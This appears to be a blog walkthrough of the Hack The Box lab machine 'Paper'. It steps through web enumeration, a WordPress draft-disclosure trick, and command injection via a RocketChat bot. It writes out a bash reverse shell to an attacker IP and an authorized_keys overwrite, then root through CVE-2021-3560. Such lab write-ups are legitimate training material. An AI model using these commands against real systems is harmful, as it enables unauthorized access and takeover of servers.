WALK THROUGH: HACK THE BOX: PAPER

/ John / Leave a comment

Paper was written by Secnigma and is an homage to one of the greatest TV series of all time, The Office! Enumeration (like most things) is key to rooting this box. Enumeration using various tools is important to gain the initial foothold. Next, enumeration of a WordPress site gives you access to secret information. Using this secret information, you gain access to an application that, with some googling, you can use to get your user level reverse shell. More enumeration of the box shows that the box is vulnerable to CVE-2021-3560, which our author has generously given us a Proof of Concept in their GitHub.

Initial Enumeration

Right off the bat, we need to start our enumeration of the box, so I start off with an nmap scan:

nmap -sC -sV -oA nmap/paper 10.10.11.143

Initial nmap scan

We see that there are three ports open: ssh, http, and https. Let’s go take a look at the websites.

Test page when navigating to 10.10.11.143 on port 80 and 443

There doesn’t seem to be anything to interesting on this page and there is nothing of interest in the source code. I tried a gobuster scan with the following command, but didn’t get a hit.

gobuster dir -u http://10.10.11.143 -w /opt/seclists/Discovery/Web-Content/raft-small-words.txt

Back to the drawing board. We know that this is a website and that there are other tools to analyze a website. So let’s give Nikto a chance and see if anything different comes up.

nikto -host http://10.10.11.14

Nikto shows us a host name of office.paper

Bingo! Our Nikto scan shows us a host name of office.paper. We add that to our /etc/hosts file and take a look at office.paper.

A WordPress site with posts and comments from prisonmike, Creed Bratton, and Nick!

We find a really fun homage to one of the greatest TV shows ever, The Office! At the Blunder Tiffin blog, we see a few blog posts from prisonmike. After examining a few of his posts and the comments, we see a nugget of information that may be able to help us!

Uh-oh! Michael has been putting secret content into his drafts! Let’s see if we can exploit that…

Apparently Michael has been putting secrets into his drafts and Nick has told us that isn’t secure. Let’s use another tool, WPScan, to see if anything comes up.

wpscan --url http://office.paper --api-token <INSERT YOUR API TOKEN HERE>

Something to note, WPScan requires an API token in order to see the vulnerability information. Create an account at https://wpscan.com/ in order to get your API token.

WPScan shows us 32 vulnerabilities, including a vulnerability to view draft posts

We are in luck! This version of WordPress is vulnerable to unauthenticated view of draft posts! You can go to this website to get a very in-depth write up of the vulnerability: https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/. To summarize it for our purposes, you just have to add ?static=1 to the end of the website in order to leak the secret info. Let’s give it a try.

Michael tells us that we can access a private chat system!

Success! Michael inadvertently tells us that we can register for a secret chat service at this address: http://chat.office.paper/register/8qozr226AhkCHZdyY

Let’s add the chat.office.paper subdomain to our /etc/hosts and keep going!

Getting Remote Code Execution and the User Flag

Michael has created an employee chat system with RocketChat

We navigate to the address and find a RocketChat registration page. We can self-register and log into the app.

A chat room with our favorite characters from The Office!

We are able to navigate through a read only chat log that tells us that Dwight created a bot to help answer questions called recyclops. We can create a one-on-one chat with recyclops and see what he can tell us. With the “recyclops help” command, recylops tells us that he can engage in small talk, tell us a joke, list all the files in the sales directory, cat out a file in the sales directory, and tell us the time. However, the ability to execute commands is not limited to the sales directory as intended and we can list the contents of directories and cat files across the system! Unfortunately this doesn’t work for user.txt, so we have to get onto the system to get that flag.

Recyclops is not as secure as Dwight thinks…

I was not familiar with RocketChat, so I did some googling to learn about the chatbot. This website told me that hubot was the name of the bot, which we can see in Dwight’s directory: https://developer.rocket.chat/bots/bots-development-environment-setup. After digging around the hubot directory, we see that the bot’s commands are all in the scripts directory. We do some digging into the scripts and we see this in cmd.coffee.

Not very secure indeed…

This tells us that we have remote code execution by typing “recyclops cmd <insert command>”. We can either set up a remote listener with netcat and get a reverse shell as hubot or we can create an ssh key and echo the public key into Dwight’s authorized keys file.

Option 1: Netcat

First, we set up a listener with: nc -nvlp PORT

Then we use the following recyclops command in order to get a reverse shell:

recyclops cmd bash -i >& /dev/tcp/<YOUR IP ADDRESS>/<LISTENING PORT> 0>&1

Option 2: SSH

I created an ssh directory to work in. Using ssh-keygen, I created private/public ssh key pair called “dwight” and copied the contents of dwight.pub.

Then, I used recyclops to insert the public key into the authorized_keys file like so:

recyclops cmd echo "<YOUR NEW PUBLIC KEY>" > /home/dwight/.ssh/authorized_keys

Once that is complete, I SSH into the machine with

ssh -i dwight dwight@10.10.11.143

I chose to go with option 2 and was able to read our user flag!

We have the user flag!

Privilege Escalation to Root

Since I am on a public version of the box, I decided to go into the /tmp directory and create my own directory so that I’m not leaving a mess or hints for others. Now, I need to do some more enumeration. To do this, I want to get linpeas onto the box. To do that, I set up a python web server with

python3 -m http.server <PORT>

after I move a copy of linpeas into my current working directory.

On the target machine, I simply wget the file with

wget http://<IP>:<PORT>/linpeas.sh

I edit the permissions with chmod +x linpeas.sh and then run linpeas.

linpeas tells us this machine is vulnerable to CVE-2021-3560

Based on the timing of this box’s release, this is very likely the escalation method we need to use to get root. CVE-2021-3560 is a vulnerability in polkit version 0.113 or later. Through mishandling of an error, an attacker can bypass authentication requirements and gain root level permissions. I am definitely not an expert in this, so check out this article to learn all about this vulnerability: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/.

It just so happens that the author of our machine has also created a PoC and does an excellent job of summarizing the flaws in polkit that allow this escalation of privileges, which can be found here: https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation.

I copied the raw code in poc.sh into the target machine and ran it. It took a few tries (which was to be expected based in output from the script) and it created a username of secnigma with a password of secnigmaftw.

Rooted!

With the successful creation of our new account, we can execute sudo bash in order to get root level permissions! We cat root.txt and have successfully owned this box!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.